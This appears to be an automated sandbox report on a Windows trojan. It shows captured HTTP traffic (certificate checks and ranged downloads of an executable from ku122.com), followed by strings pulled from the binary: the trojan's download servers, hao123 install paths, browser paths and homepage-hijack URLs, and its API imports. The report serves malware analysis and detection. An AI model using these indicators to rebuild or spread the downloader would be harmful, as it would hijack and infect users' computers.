Date: Mon, 24 Apr 2017 01:45:49 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d0c7575d3859fe8a702672783a4f216661492998349; expires=Tue, 24-Apr-18 01:45:49 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 23:44:24 GMT
Expires: Thu, 27 Apr 2017 23:44:24 GMT
ETag: "1af051037518cde9e06027456ab73813cdee0dd4"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 354562a613fd4eea-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
3234424Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.....S.."........20170423234424Z....20170427234424Z0...*.H............
...Qv.`op........XpR./3l..7...~....z@Z....i.tA .....z..\...6..X#.)..A.
...I....|..s.V"L..0[...{2...,.i.U[q.........|S.`.\:.L..3.{).~O.W.T-...
T...~.K$. ...pp..0#...../Z...@./@.b...Z.LSwhIl..#......2.....K....2m.|
....UF/...t.V(...i.D....(...NY.X..8P..(.U.........K0..G0..C0.. .......
o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1
<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...17
0213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1
.0...U....2017021315051M0K..U...DGlobalSign Organization Validation CA
- SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j
..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u
..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G
..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..W
b.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.....
..M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0.....
.0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/re
pository/0...U...........0...U.%..0... .......0...*.H..............=..
{.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...4..
...f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~....
.......E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....NS.w<<< skipped >>>
GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1
Host: down.ku122.com
Accept: */*
Referer: hXXp://down.ku122.com/download/2345
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=21538611-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT
Accept-Ranges: bytes
ETag: "57869c6aa43d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:47 GMT
Connection: close
Content-Length: 86154445
Content-Range: bytes 21538611-107693055/107693056Y.~...\...]....$"&.L..^.$..6......~.....u..:Hd... . ..............4.N.
Su.K.....{."..>..@......I.b...z2..q.>...Y.x;.\g\.T^....v..*@....
.B .....V..B.o.o.....&.F..Z..8.;.3.sw(.B?F.A.^.zz.Q...1...@..B.....1y.
.Ie...7..M...r.<..T0.-...y..5.j.a.,7S]r....k....?@..t..C.ug.P.I.}TM
.7.K.-..._.3>.......X.......I..............`> .9.]............`.
j.u...B.?..=R...X...X.|.xO:m......>..|;a.@$...ks[.Q.Y....>: ....
y.......[...aV.O.Qf...7..WC.F...;i....8..#.......&A.... #......pT...y.
..p.ZZg~.8s.-M...:....\...u.w..... ?.i..Q.....>u.......f.Z[....G.C.
......b.Zy.d.~..G"K(......6.^/.......y<N..y..<'?..UY..\.).j6qb-.
...W.$...8..2....f....6..8...u...s.N... <..L.>.n..f..U...S.*ZA.,
@..G.zE...L].<Y......n.Dz ...y....AI..`"..&G.....'..k.OE....f%}oN..
...z7....9........n......UI.Y...m....zg.I....~........_.6@...r.W... E.
.)S(Q^...H]G...~kD......D=7..&)...E....(.....|. . E.P~x.h..%...4;.....
N...N........z.:.....&W=..t'b.....W.1.....d..........'}."..[.Z...e.T..
...%....sas.L..3.`.\..o5...S...Es'..;%]fw.i..v..OY .)?...H......ED.G..
..?]..A.........5.5......'.t.#H~.......c..&/...G...W..z.....FG...p...K
F..ol.R>.x1.m.9..RUM.P.Y&V..xo..).#m.2G...mJ.D..B.Q.......a..Rg....
...KV.......b".GVz.G... :...zw.m....":uv.u..-X..`...;.CC.i.2.&....XG3.
J..;.YS[]>.=>..GWB..9Nh_.......K..8.:u........c.A\..P...j6pJ.lg.
.5.k.P...U...@.p.......{.....w.l_....G{kx).d#h..T.....O:.WQ.g......K..
.5....v....!5........A... `...4....S/............g..q..`.U|A. .....yiK
J/.C.|.S..f..J.U.s...U...*QN....h0E....9.,.G.......2n...h..OM....*<<< skipped >>>
GET / HTTP/1.1
Accept: text/html, application/xhtml xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.ku122.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Fri, 06 Jan 2017 11:10:28 GMT
Accept-Ranges: bytes
ETag: "49ed27cd68d21:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:44:59 GMT
Content-Length: 549.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f..mW../Z...}tR
-.|.n?.....".(..'.}........[.~.....O|u....7. z....oN_....6...E...t..M.
~v1.....P..-....................W...._.;......7...w.;jt.`:.f...L.b....
..G?.]f.!.................8...t].M.Y..............>....?....t.....x
......Z..=....yx.........../.._.............o.........~.8.....mB.!.:..
....tg<]..=.z.Y...e..r.a~~0........x.."[....y.A/i._d.||^VU.....rV-.
.|k..*.i....u~....{.......wW(E...i.,.l........||............Y?...HTTP/
1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modi
fied: Fri, 06 Jan 2017 11:10:28 GMT..Accept-Ranges: bytes..ETag: "49ed
27cd68d21:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powe
red-By: ASP.NET..Date: Mon, 24 Apr 2017 01:44:59 GMT..Content-Length:
549...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@..
....{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6..E.f..mW../Z.
..}tR-.|.n?.....".(..'.}........[.~.....O|u....7. z....oN_....6...E...
t..M.~v1.....P..-....................W...._.;......7...w.;jt.`:.f...L.
b......G?.]f.!.................8...t].M.Y..............>....?....t.
....x......Z..=....yx.........../.._.............o.........~.8.....mB.
!.:......tg<]..=.z.Y...e..r.a~~0........x.."[....y.A/i._d.||^VU....
.rV-..|k..*.i....u~....{.......wW(E...i.,.l........||............Y?...
..<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDCbsuynjBBR4wRmkHQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:36 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d739c3d462e562b96772168363ac55d181492998336; expires=Tue, 24-Apr-18 01:45:36 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 22:21:57 GMT
Expires: Thu, 27 Apr 2017 22:21:57 GMT
ETag: "4d85c93097530c8a95e29e6ae26f53ce0f5c35b3"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 35456250f35b4e42-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
3222157Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.&..)...x........20170423222157Z....20170427222157Z0...*.H............
.{j...TZ....>...H.]t.0^)Z?..3.......v.[...<o"9].y.1...D .Y.....k
jv...!e.K..k..p..~a|...=...F.]Uh...9 ..f!.....Z.]..n...<]......2W@.
....)9o...7I...;#..>.....q-.Y8.X....a...j...Sa....RLr2......9.qx...
....gY..........\/(.l.........o6..C.D.<*&..X8vhX;.I...........K0..G
0..C0.. .......o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....Gl
obalSign nv-sa1<0:..U...3GlobalSign Organization Validation CA - SH
A256 - G20...170213071103Z..170516071103Z0..1.0...U....BE1.0...U....Gl
obalSign nv-sa1.0...U....2017021315051M0K..U...DGlobalSign Organizatio
n Validation CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............
0.........C..0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k...
....D.........u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V
...l...P.6.V..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m
..e;.....n.~..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a......
..0..0...U.......M........u....%...G0...U.#..0.....a....)S...};..@..|0
... .....0......0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.gl
obalsign.com/repository/0...U...........0...U.%..0... .......0...*.H..
............=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...
&..%....2...4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y.
..".2b....~...........E..U_..Y[....b.G'}..^-.....:.mo......=......<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDDmLIcmlTqSuuT3NuQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:43 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d204234301048b90900ff957776cd3fcb1492998343; expires=Tue, 24-Apr-18 01:45:43 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Mon, 24 Apr 2017 00:37:42 GMT
Expires: Fri, 28 Apr 2017 00:37:42 GMT
ETag: "4fadf1178a8b6c14524f2bbe490f7f182022faab"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 3545627f20b84e42-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
4003742Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.9.!..N...=......20170424003742Z....20170428003742Z0...*.H............
.d.....A:B/........;u....-h./.Az..W..7D..}....n.........."n!.4.s.j....
yCONa.kLB.=.E.r..z.'.........'.4.PG..<j.............R4%.....G...V..
...&.7b..^F.Z..2....N.{[..E.S@..Cp...m6..C..bB.......i.HC=.1....a.'.c)
5....-......9=W....(2\6V.....cHmTZB.k.........Q.3....K0..G0..C0.. ....
...o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-
sa1<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20..
.170213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-
sa1.0...U....2017021315051M0K..U...DGlobalSign Organization Validation
CA - SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C.
.0j..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.......
..u..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V
..G..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~
..Wb.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U..
.....M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0..
....0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com
/repository/0...U...........0...U.%..0... .......0...*.H..............
=.. {.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...
4.....f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~.
..........E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....N<<< skipped >>>
GET /gsorganizationvalsha2g2/ME0wSzBJMEcwRTAJBgUrDgMCGgUABBQMnk2cPe3vhNiR6XLHz4QGvBl7BwQUlt5h8b0cFilTHMDMfTuDAEDmGnwCDAqEDhBT4Lgi0Ijg9w== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:49 GMT
Content-Type: application/ocsp-response
Content-Length: 1570
Connection: keep-alive
Set-Cookie: __cfduid=d17476f031ac0eefdd7e1102c438b28301492998349; expires=Tue, 24-Apr-18 01:45:49 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 23:44:24 GMT
Expires: Thu, 27 Apr 2017 23:44:24 GMT
ETag: "1af051037518cde9e06027456ab73813cdee0dd4"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 354562a603a34e42-DME0..........0..... .....0......0...0.......M........u....%...G..2017042
3234424Z0o0m0E0... ..........M.=......r......{.....a....)S...};..@..|.
.....S.."........20170423234424Z....20170427234424Z0...*.H............
...Qv.`op........XpR./3l..7...~....z@Z....i.tA .....z..\...6..X#.)..A.
...I....|..s.V"L..0[...{2...,.i.U[q.........|S.`.\:.L..3.{).~O.W.T-...
T...~.K$. ...pp..0#...../Z...@./@.b...Z.LSwhIl..#......2.....K....2m.|
....UF/...t.V(...i.D....(...NY.X..8P..(.U.........K0..G0..C0.. .......
o.8...C.P=;E0...*.H........0f1.0...U....BE1.0...U....GlobalSign nv-sa1
<0:..U...3GlobalSign Organization Validation CA - SHA256 - G20...17
0213071103Z..170516071103Z0..1.0...U....BE1.0...U....GlobalSign nv-sa1
.0...U....2017021315051M0K..U...DGlobalSign Organization Validation CA
- SHA256 - G2 - OCSP Responder0.."0...*.H.............0.........C..0j
..R........0.".e.&.6'.d..._.....8...Y..../..z..-hi.k.......D.........u
..>h....T2..~..*;...v.^.!d.......8.p.e..me...>..V...l...P.6.V..G
..;X.......12U.)D.E(ldQ...67..@......l...A.>l......m..e;.....n.~..W
b.?..gE.......a.KM.F...}.qo;S...`/..s....6....G.a........0..0...U.....
..M........u....%...G0...U.#..0.....a....)S...};..@..|0... .....0.....
.0L..U. .E0C0A.. .....2._0402.. ........&hXXps://VVV.globalsign.com/re
pository/0...U...........0...U.%..0... .......0...*.H..............=..
{.o...../...;[...!.._..3.......i{.."...I1....... w\...&..%....2...4..
...f....S.. Zz...q..{o. .e1[...X.2..F6$....'...[.s@..Y...".2b....~....
.......E..U_..Y[....b.G'}..^-.....:.mo......=........)x..k....NS.w<<< skipped >>>
GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1
Host: down.ku122.com
Accept: */*
Referer: hXXp://down.ku122.com/download/2345
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=86154444-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT
Accept-Ranges: bytes
ETag: "57869c6aa43d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:47 GMT
Connection: close
Content-Length: 21538612
Content-Range: bytes 86154444-107693055/107693056..5#,D.5.X.{<...U.I..B..F..b....?. .Ak.Y...........mt.#.]..@....G..
.......j...k.x.@-i..dt.......~` . ..]..)3:...9K.r.?>...'B.>}..~.
. .sG. ...a..5..6..........W>i.p.....}.#R%N._.`;.......E.u..].;.l.|
s..p.V..V[<.D>...`$..U.sR.n......LY....$..4. ...Pm.S!.. ........
........ .(...G.....q......s.....V}..D5fa......mr.<.0....(#.!....1.
[*..c....}Ep...y;.......%<....>.U........g.d..i..]...I.C(.8Y^;..
........kJ.m6....T.={"......|*...jt.;..Z....1..T...&..(.5=...KJE.5,..B
I...T.}....X./W.Y..W.%....L..N..B;.6.-[..Q.c....".............R..t..`.
..3x....IB.d.>>...<'.PN.f..._..8..E...J.%N.7.......#..H.....b
q.....k......o..\.m.F#..n{..mW,8..V.3.E.....,.e..Q/7q^u/U:!/..X.i'...r
Eo:kVB.......UE.~C...e...BZ{....c.yL.Y.2.8..>T'...k7mA...|/.z..V..3
.......KLd.|.........)..^.^B...P`>.&4...;.O.I....$~.....pk.rU..ZE..
..~b.#B....EqL.c..|.......,=3.\..C.......W<...gK.X."...}.//.=......
.v....o9.u..).Z""...17...t.;(......V(.....W.B..V..c..G.HH..8.2..~B..e6
....uV;..h!E....vm.. HzI.^x_.n.Vn.-..p.E..\.t....Q<J..........A....
..2`;...fZ4..2.r..'.....!..UT$S..=..q`..S..(..G.|..r%...{.d.....^A=..T
S........^d...7.qlZb.tb._...1._....R.3 ...f(..?../}..A....9D.X..gY....
p[..B.....(&.-.....!.!@.c.,.......?....?......}.(,..$..m....K?...Q...M
....L'~..)...(..>.#.HJ....{.....{...CH#R%.....G...]t.....w..[..Uc.:
.Z.d...G..y.^KEYL..<=.S..C........R....L.WO.D.._..LG........R.1...:
..N.).....J8...].....~..Z.<..4.aaHg.(...z...ek%A.Z.:..yD.=.b.......
.].2`.]R.%.98p.......tcb..a.iF.'.y!]N.8.k.e,[.%...8..11...cZ.Xr.t.<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEFE/uXQ4cLc0QEGNMJMGmf8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: s2.symcb.com
HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1763
content-transfer-encoding: binary
Cache-Control: max-age=418865, public, no-transform, must-revalidate
Last-Modified: Fri, 21 Apr 2017 22:02:18 GMT
Expires: Fri, 28 Apr 2017 22:02:18 GMT
Date: Mon, 24 Apr 2017 01:45:14 GMT
Connection: keep-alive0..........0..... .....0......0...0.......WI.....L.c=...r..7Z..2017042
1220218Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..Q?.t8p.4@A.0........20170421220218Z....20170428220218Z0...*.H.....
...........o........WI..|.-.........~........7..Uy.....5.u........8.*.
,9h.uQy9... =[z.....4q...t..q.t...{.n.....a/........Y.|.F...s..J..._p.
..w.....?VMk..E.xvG.....\..=.&u...a..Z...)l.%.LK.C.2V.W.....C....mV.aN
..H..R.\U&...B.'.ai....~..j.l...... .m..F.b.U...<.!.......0...0...0
..........^..)......<...T.0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...161122000000Z..171214235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 50.."0...*.H.............0.............................m..|...
.....1rUZN.b.......t. d......O...NY.lR..k .Q.z.g.4(,...Rp.7...0C.j.)Z.
....... ~..3...x.b.-..... S^0<6...!.(..2}...T.fX}...6...(...1...#..
H..|`.yy.<B.z.q$......u.-..K.!......y..8..--....?.,.[.[...5.e.4....
.D..t.;....).J....\fV..G.........0...0...U.......0.0l..U. .e0c0a..`.H.
..E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...http:
//VVV.symauth.com/rpa0...U.%..0... .......0...U...........0... .....0.
.....0"..U....0...0.1.0...U....TGV-OFF-500...U.......WI.....L.c=...r..
7Z0...U.#..0.....e......0..C9...3130...*.H.............<wN..g..<<< skipped >>>
GET /download/2345/p7_k5209809_TUi9zvUMQ8ZdGsEzPWwZ8pbdZoG.exe HTTP/1.1
Host: down.ku122.com
Accept: */*
Referer: hXXp://down.ku122.com/download/2345
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=64615833-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Last-Modified: Mon, 21 Nov 2016 03:53:09 GMT
Accept-Ranges: bytes
ETag: "57869c6aa43d21:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 24 Apr 2017 01:45:47 GMT
Connection: close
Content-Length: 43077223
Content-Range: bytes 64615833-107693055/107693056.....?...-.......J..v.....V..):....z.o....U..Z.<-.....d...v...(...3
.S.N=....#`W....}..nUi-^..W..o..P.#7..^.C. .h.a.uE..d.S.ei..........n
.\...&D.t..fQ.SV..:.ko.8..m......L.p.c..0...f..9....... ..-.KrP......}
...&B......)e.\2..Nc.l...."&....}V*..h^..i.nE.G_.Dc.?@......d.Y.0.....
e.|?=?..A.n....'.2'b0NN....tSQ..>.....E....D....tM..W ~..)L.U5K...
...#.....tw0.e^v................D.$.e..?...).qa....c.....a.k<c.V..i
i....q.......4.o30.5^.jl..4-..E..>..Y.......,.l.{F .".@Yb...fz.y...
g&..0.t.Z...x1..`......t..[..W..M6;gF,#..3)...<4.qw2j.b...xa...._..
...........znL.U...._..CW.......G._...[...."j.>..)....'_.b../...B.`
.Q.By...........x.R. <.j.q.o..8.8b...ja.(....[.)._.>D_.e......P.
@a,.....!7.kP.*....u...p{...(D..;.O,....xo...<.......'[............
.1..2..c?0......$c..-/..xS.8..?..........'...z~-f..\......1..g.y.zn..C
.' ....s*....I..._.Sz.(....5>Dy..X.{..f[....m...H............GP..BI
.Ax.GB.$..&..u.;8.iR@[.-X.V..$s..x3....E..".Z{=..S{].;.,".fZ..P.;5=...
.....L%.V.....w?\.G.j.w.....2..1b{.u".-@...!k?...k....SGK.1....88o.U..
..X..9..}.C1..4../..j}..&q.o.v.^..t ...~[W.r.`..0.:R.....(j..7..c..>
;.@H$.......y...^...=..E..r-w?....j.J.....yZ]u.o.......y'..`..!....3..
5..R.*....8..c`B....0L...X........N9.q.a..@....]..<.yD..T..!.......
:..u5.(I......M.....?B...hO.....4.ZJ.Z..g..i..v./.$.....`n...Ks.].<
...9.:....O..i.b-k..8'..C?.....8..4[;........p......rT..#...t.uU?..Y..
.......@.m...I...|..L.R0...f3.......!..I..zQ..=d...K../..Ja.I.8..[X...
.(`..J...Zu-..A.pi4........9v....&.O.JF.oO.6g1.|..}s...}Q.vI.a....<<< skipped >>>
GET /rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH HTTP/1.1
Cache-Control: max-age = 10800
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 13 Oct 2016 07:50:34 GMT
If-None-Match: "6b9ba9eca642c891cc02365fc6161341647bd9fc"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.globalsign.com
HTTP/1.1 200 OK
Date: Mon, 24 Apr 2017 01:45:30 GMT
Content-Type: application/ocsp-response
Content-Length: 1518
Connection: keep-alive
Set-Cookie: __cfduid=dc4351f0e9fefbcca39f4481f0357a4611492998330; expires=Tue, 24-Apr-18 01:45:30 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Sun, 23 Apr 2017 23:57:25 GMT
Expires: Thu, 27 Apr 2017 23:57:25 GMT
ETag: "c928e2d374665088a12ae522bef2636fe56a734c"
Cache-Control: public, no-transform, must-revalidate
CF-Cache-Status: HIT
Server: cloudflare-nginx
CF-RAY: 3545622f22844e30-DME
[binary OCSP response body not shown; readable fragments: response timestamps 20170423235725Z and 20170427235725Z, responder certificate "GlobalSign OCSP for Root R1 - Signer 1" (C=BE, O=GlobalSign nv-sa, validity 170407000000Z to 170715000000Z, issuer GlobalSign Root CA), policy URL hXXps://VVV.globalsign.com/repository/]
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
`.rsrc
t$(SSh
~%UVW
u$SShe
hXXp://down.ku122.com/
\Local Settings\Application Data\hao123\config.ini
hXXp://VVV.ku122.com
\Local Settings\Application Data\hao123\hao123.exe
.text
`.rdata
@.data
.rsrc
@.reloc
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
CCmdTarget
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
CNotSupportedException
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
mscoree.dll
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
GetProcessWindowStation
USER32.DLL
operator
OLEACC.dll
d:\code\zebra_proj\dt_proj\basic\Output\BinRelease\Hao123Proj.pdb
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
RegOpenKeyExW
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
ole32.dll
OLEAUT32.dll
.PAVCException@@
.PAVCMemoryException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCFileException@@
.PAVCOleDispatchException@@
zcÁ
.?AVCCmdTarget@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>7%7s7
?$?(?,?0?4?8?<?@?
7074787<7@7
? ?$?(?0?
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Beijing baidu Netcom science and technology co.ltd1>0<
2Beijing baidu Netcom science and technology co.ltd0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
\2345Soft\2345Explorer\2345Explorer.exe
hXXp://VVV.2345.com/?k5209809
\Tencent\QQBrowser\QQBrowser.exe
\liebao\liebao.exe
360se6\Application\360se.exe
hXXp://hao.360.cn/?src=lm&ls=n29ef8d0697
\Local Settings\Application Data\360Chrome\Chrome\Application\360chrome.exe
\Local Settings\Application Data\360Chrome\Chrome\Application\
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
MPR.dll
VERSION.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
